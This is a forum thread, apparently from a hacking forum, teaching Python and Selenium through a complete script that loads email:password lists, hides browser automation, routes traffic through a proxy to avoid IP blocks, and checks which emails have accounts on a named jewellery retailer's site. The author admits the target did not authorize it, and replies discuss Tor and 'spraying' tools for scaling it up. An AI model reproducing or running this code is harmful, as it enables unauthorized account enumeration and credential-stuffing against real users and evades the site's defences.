Python + Selenium: Add proxy function to prevent IP from being blocked[SE07]
by - Thursday, January 1, 1970 at 12:00 AM
In this subsection, we continue to improve our program.

First, look at the code example:
def WebdriverInitialization(proxy_info):
    """
    Encapsulate DRIVER and add custom HTTP proxy function
    :param proxy_info:
    :return:
    Create a selenium object, then you can use the methods of this object, if you don't understand, you can ignore it, copy and paste with me
    """
    # Custom option parameters
    options = webdriver.ChromeOptions()
    options.add_argument("start-maximized")
    options.add_experimental_option("excludeSwitches", ["enable-automation"])
    options.add_experimental_option("excludeSwitches", ["enable-logging"])
    options.add_experimental_option('useAutomationExtension', False)
    options.add_argument('--disable-blink-features=AutomationControlled')
    options.add_argument('disable-cache')
    options.add_argument('-ignore-certificate-errors')
    options.add_argument('-ignore -ssl-errors')

    # Add custom proxy: use http proxy
    options.add_argument(f'--proxy-server=http://' + proxy_info)

    # Download the Chrome kernel locally, then, we load it
    _chromePath = r"r:\chromedriver.exe"
    # Use Service(), initialize
    chromeService = Service(_chromePath)
    # The only thing to note about the two parameters here is options. In the front, we customized these options, then DRIVER will use it as we customized
    DRIVER = webdriver.Chrome(options=options, service=chromeService)

    # Returns the DRIVER that has been initialized
    # Note that the return value is an "object"
    return DRIVER


Compared with the first lesson, when we initialized the DRIVER in the main function, after this encapsulation, the distance from the final "code reusability" and "modularity" is closer.

Bro, what did you find in the initialization DRIVER function? A careful comparison is that there is one more parameter proxy_info, and then the HTTP proxy is used during initialization. Finally, this function has a return value "DRIVER". The type of this return value is an object (an object that we have initialized)

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# 2022-07-28
# Breached.to Bullet Class: mejuri Project
# THE FAST ONLINE VERSION 1.0CB

import os
import time

# Import selenium package
from selenium import webdriver
from selenium.webdriver.chrome.service import Service

# New Import
from selenium.webdriver.common.by import By


def Loading_AccountFile():
    """
    Load the account text file from the local disk, and read each line of data in it for parsing. The parsed data is in the form of a dictionary.
    Then we add the dictionary to a list for the program to call in a loop.
    :return: (type)List -> Account List
    Account file format:
    account password
    Note: Use ":" to separate the account and password.
    account.txt:
    [email protected]:a123456
    [email protected]:a1234567
    [email protected]:a12345678
    """
    # Define a list of accounts for saving the results
    RESULT_ACCOUNT_LIST = []

    _inputFileName = r"r:\account.txt"

    # Check if the account file exists
    if os.path.exists(_inputFileName) is False:
        print("Debug Output: Don't open Account File.")
    else:
        # Loading Account File
        with open(_inputFileName, "r", encoding="utf8") as r:
            _rawData = r.readlines()

        for accountNode in _rawData:
            _tmpStr = str(accountNode.strip()).split(":")
            # The result of each line parsed is added to the result list.
            RESULT_ACCOUNT_LIST.append(_tmpStr)

        # Finally, return this result list
        # Check the length of the returned account list
        if len(RESULT_ACCOUNT_LIST) == 0:
            return False
        else:
            return RESULT_ACCOUNT_LIST


def Input_Account(object_driver, account_info):
    # Real combat code:
    BASE_URL = "https://mejuri.com/"
    object_driver.get(BASE_URL)

    # Changes from previous: different places
    success_Box_Title_Str = ['Mejuri | Everyday Fine Jewelry | Online Jewelry Shop', ]
    success_Box_URL_Str = ["https://mejuri.com/", ]
    if object_driver.title in success_Box_Title_Str or object_driver.current_url in success_Box_URL_Str:
        print("Debug Output: Specific business code part...")
        # 1. Look for the login element:
        _element_Login_btn = object_driver.find_element(By.XPATH,
                                                '/html/body/div[1]/div[3]/div/section/header/nav/div[2]/button/span')
        # 2. Use the sleep method to force a delay.
        # This is an officially not recommended method, and is only used here as an explanation.
        time.sleep(1)
        # 3. Once the login element is found, click it using the click() method.
        _element_Login_btn.click()
        time.sleep(1)
        # 4. Navigate to the username input element
        _element_input_accountBox = object_driver.find_element(By.XPATH, '//*[@id="input-email"]')

        ######################################################
        # Old way, hardcoded. Let's cancel this line of code.
        # _element_input_accountBox.send_keys("[email protected]")
        # Use new methods.
        _element_input_accountBox.send_keys(account_info[0])
        ######################################################

        time.sleep(1)
        _element_continue_btn = object_driver.find_element(By.XPATH,
                                                    '/html/body/div[1]/div[8]/div[1]/div/div/div/div[2]/div[2]/form/div[2]/button/span')
        _element_continue_btn.click()

        print("Debug Output: Input Account Success.")
        return True

    else:
        print("Debug Output: Open URL Fail...")
        return False

def Verify_Result(object_driver):
    """
    Check result
    :return: Bool
    To locate two elements, we take the parameter: string
    Then, if we do not take the string as the basis for judging the result, we can also use other methods.
    """
    VERIFYBOX = ['Please create an account', ]
    # XPATH
    # /html/body/div[1]/div[8]/div[1]/div/div/div/div[2]/div[1]/div[1] = Looks like you’re new!
    # /html/body/div[1]/div[8]/div[1]/div/div/div/div[2]/div[1]/div[2] = Please create an account
    _element_check_str = object_driver.find_element(By.XPATH, '/html/body/div[1]/div[8]/div[1]/div/div/div/div[2]/div[1]/div[2]')

    if _element_check_str.text in VERIFYBOX:
        # If the result matches the expected value
        # Then, it means that the account you are testing is not registered
        print("Debug Output: Verify_Result function result:[{}]".format(_element_check_str.text))
        return False
    else:
        return True


def Save_Result(account_result_list):
    """
    Save results to local text file: Note that if the results list is empty, no saving is necessary.
    :param account_result_list:
    :return:
    """
    if len(account_result_list) == 0:
        print("Debug Output: Save the result to a text file: The result is empty, and writing to the file is ignored..")
    else:
        print("Debug Output: Save the results to a text file: [{}] results, start writing the results to the file.".format(len(account_result_list)))
        # In append write mode, write the result to the local specified file
        # Parameters: "a", which represents the append mode
        with open(r"r:
esult.txt", "a", encoding="utf8") as wa:
            for resultNode in account_result_list:
                wa.write(str(resultNode[0] + ":" + resultNode[1] + '
'))


def WebdriverInitialization(proxy_info):
    """
    Encapsulate DRIVER and add custom HTTP proxy function
    :param proxy_info:
    :return:
    Create a selenium object, then you can use the methods of this object, if you don't understand, you can ignore it, copy and paste with me
    """
    # Custom option parameters
    options = webdriver.ChromeOptions()
    options.add_argument("start-maximized")
    options.add_experimental_option("excludeSwitches", ["enable-automation"])
    options.add_experimental_option("excludeSwitches", ["enable-logging"])
    options.add_experimental_option('useAutomationExtension', False)
    options.add_argument('--disable-blink-features=AutomationControlled')
    options.add_argument('disable-cache')
    options.add_argument('-ignore-certificate-errors')
    options.add_argument('-ignore -ssl-errors')

    # Add custom proxy: use http proxy
    options.add_argument(f'--proxy-server=http://' + proxy_info)

    # Download the Chrome kernel locally, then, we load it
    _chromePath = r"r:\chromedriver.exe"
    # Use Service(), initialize
    chromeService = Service(_chromePath)
    # The only thing to note about the two parameters here is options. In the front, we customized these options, then DRIVER will use it as we customized
    DRIVER = webdriver.Chrome(options=options, service=chromeService)

    # Returns the DRIVER that has been initialized
    # Note that the return value is an "object"
    return DRIVER


if __name__ == '__main__':
    # Initialization DRIVER
    _http_proxy = "127.0.0.1:8080"
    DRIVER = WebdriverInitialization(_http_proxy)

    ################### Business logic part ###################

    # Save results
    RESULT = []

    # Step 1: Load the account text file
    _accountList = Loading_AccountFile()
    if _accountList is False:
        print("Debug Output: Loading Account File Fail.")
    else:
        # Step 2: Loop through the loaded account list file
        for accountNode in _accountList:
            # Calling the function: Parameters: DRIVER, Account Info
            if Input_Account(DRIVER, accountNode) is False:
                print("Debug Output: Input_Account Fail.")
            else:
                # Step 3: Validation results
                print("Debug Output: Call the check result function..")
                if Verify_Result(DRIVER) is True:
                    # If the account exists, then you need to save the account to the final result list.
                    RESULT.append(accountNode)
                else:
                    print("Debug Output: If the account does not exist, skip this test and ignore saving the results.")
                    pass


        # Step 4: Save the results to a text file:
        # Note that the code is indented, at the same level as the for loop statement
        Save_Result(RESULT)

In the main main function, I call the "WebdriverInitialization" function, which returns a DRIVER that has been configured.

Then, I will use this configured DRIVER in the business logic to complete the business logic.

The tutorial is written in this chapter, I don't know if you are trying hard to keep up with me. If you're keeping up with me, congratulations, you've entered the world of Python.

Unfortunately, I use this "look illegal" (meaning not authorized by the test site company) to teach the course.
However, for many brothers who are new to Python, maintaining interest is the best motivation for learning! Please keep your excitement up. Share your joy and achievements.

In the next course, we will still improve and transform on the basis of this example.
Because in the previous course, we still have several functions to improve:
1. This spaghetti code -- pass
2. Find the username and password elements and perform an input test -- pass
3. Multithreading, and then executing concurrently (for example, I want to test 100 accounts together)
4. Custom use proxy --pass
5. Customize User-Agent
6. Load account information from a text file or my database
7. Save the results -- pass

##############################################
Replenish:
Regarding HTTP access to HTTPS sites, I do not recommend the use of HTTP proxy here. Regarding this issue, many brothers PM me to ask "why".
I think it is difficult to explain this problem completely in one post. If you are interested, you can search for this topic.
Reply
Google chrome ha a --proxy-server flag if started via cli, could be easyer
Reply
(July 28, 2022, 04:19 PM)dgrwgrwg Wrote: Google chrome ha a  --proxy-server flag if started via cli, could be easyer

Thanks Reply.
The cli configuration proxy method can be used.
However, it is not very friendly to friends who have just come into contact with it, and it is necessary to turn on the debug local debugging mode.
Of course, DRIVER based on cli configuration is easier to control fine-grained.
Reply
why not route selenium through Tor? https://pypi.org/project/tbselenium/
i get its not the same as using proxies you know, but it seems a little easier
Reply
(July 28, 2022, 06:28 PM)SnekGuy Wrote: why not route selenium through Tor? https://pypi.org/project/tbselenium/
i get its not the same as using proxies you know, but it seems a little easier


Tor network latency....
Reply
I think using NodeJS + puppeteer is petty much the standard way to go about srapping / spraying projects , well documented and maintained ... sugar syntexes ain't a bad thing for these kind of tasks .
Reply
(July 28, 2022, 06:28 PM)SnekGuy Wrote: why not route selenium through Tor? https://pypi.org/project/tbselenium/
i get its not the same as using proxies you know, but it seems a little easier


Because of the anonymity of tor network, I believe many people are willing to try to use it. In this course, I will consider it. But because of the particularity of tor, a lot of basic coding work is required:
1. Get agent from tor
2. Create tor based IP proxy pool
3. Allocate agents, judge agent delay, and schedule agent pool
This is not suitable for example in the current course. Please understand.


(July 31, 2022, 03:35 PM)oxymorony Wrote: I think using NodeJS + puppeteer is petty much the standard way to go about srapping / spraying projects , well documented and maintained ... sugar syntexes ain't a bad thing for these kind of tasks .


Yes, puppeter is a good framework. I will talk about it later ^_^
Reply
nice...selenium via tor..didnt know about it yet...thx :)
Reply
(August 26, 2022, 08:09 AM)trollinator321 Wrote: nice...selenium via tor..didnt know about it yet...thx :)


:D you are welcome.
Reply


 Users viewing this thread: Python + Selenium: Add proxy function to prevent IP from being blocked[SE07]: No users currently viewing.